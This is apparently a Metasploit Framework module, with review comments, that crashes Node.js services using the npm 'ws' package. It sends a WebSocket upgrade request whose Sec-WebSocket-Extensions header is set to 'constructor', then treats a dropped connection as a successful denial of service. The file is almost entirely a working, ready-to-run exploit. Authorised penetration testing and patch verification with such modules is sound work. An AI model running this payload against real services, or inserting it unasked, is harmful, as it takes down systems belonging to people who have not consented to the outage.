rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/ws_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
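# Auxiliary module that checks whether a Node.js service using the npm "ws"
# package terminates when it receives a WebSocket upgrade request whose
# Sec-WebSocket-Extensions header carries the value "constructor".
#
# Stability is declared as CRASH_SERVICE_DOWN: a vulnerable service stops
# responding and has to be restarted, so runs belong in an authorised
# maintenance window against systems that can tolerate an outage.
#
# NOTE(review): the advisory text is not part of this file. The trigger value
# is the name of a property that every plain JavaScript object inherits, which
# suggests the header parser indexes a plain object by extension name; confirm
# against the advisory listed under 'References'. Remediation is to upgrade
# "ws" to a release containing the fix named there.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers the module metadata and its options: RPORT (default 3000) and
  # TARGETURI (default '/').
  def initialize
    super(
      'Name' => 'ws - Denial of Service',
      'Description' => %q{
        This module exploits a Denial of Service vulnerability in npm module "ws".
        By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.
      },
      'References' => [
        ['URL', 'https://nodesecurity.io/advisories/550'],
        ['CWE', '400'],
      ],
      'Author' => [
        'Ryan Knell, Sonatype Security Research',
        'Nick Starke, Sonatype Security Research',
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    register_options([
      Opt::RPORT(3000),
      OptString.new('TARGETURI', [true, 'The base path', '/']),
    ])
  end

  # Sends one upgrade request and reports the outcome:
  #
  # * a reply whose status line is 101 means the handshake was accepted and
  #   the service survived, so it is reported as not vulnerable;
  # * any other reply, or no reply at all, is reported through fail_with;
  # * a reset or closed connection while waiting for the reply is reported as
  #   the service having gone down.
  #
  # The socket is closed on every path, including the fail_with and rescue
  # paths, which the previous version left open.
  def run
    path = datastore['TARGETURI']

    # Create HTTP request
    req = [
      "GET #{path} HTTP/1.1",
      'Connection: Upgrade',
      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(5..14)}",
      'Sec-WebSocket-Version: 8',
      'Sec-WebSocket-Extensions: constructor', # Adding "constructor" as the value for this header causes the DoS
      'Upgrade: websocket',
      "\r\n"
    ].join("\r\n")

    connect
    print_status("Sending DoS packet to #{peer}")
    sock.put(req)

    data = sock.get_once(-1) # Attempt to retrieve data from the socket

    # Only the status line counts. An unanchored /101/ would also match "101"
    # inside a header value or body (for example "Content-Length: 101") and
    # misreport an error response as a successful upgrade. get_once may return
    # nil when nothing arrives, hence to_s.
    if data.to_s.match?(%r{\AHTTP/1\.[01] 101\b})
      print_error('WebSocket Upgrade request Successful, service not vulnerable.')
    else
      fail_with(Failure::Unknown, 'An unknown error occurred')
    end

    print_error('DoS packet unsuccessful')
  rescue ::Rex::ConnectionRefused
    print_error("Unable to connect to #{peer}")
  rescue ::Errno::ECONNRESET, ::EOFError
    print_good("DoS packet successful. #{peer} not responding.")
  ensure
    # fail_with raises, so without this the socket stayed open on that path.
    disconnect
  end
end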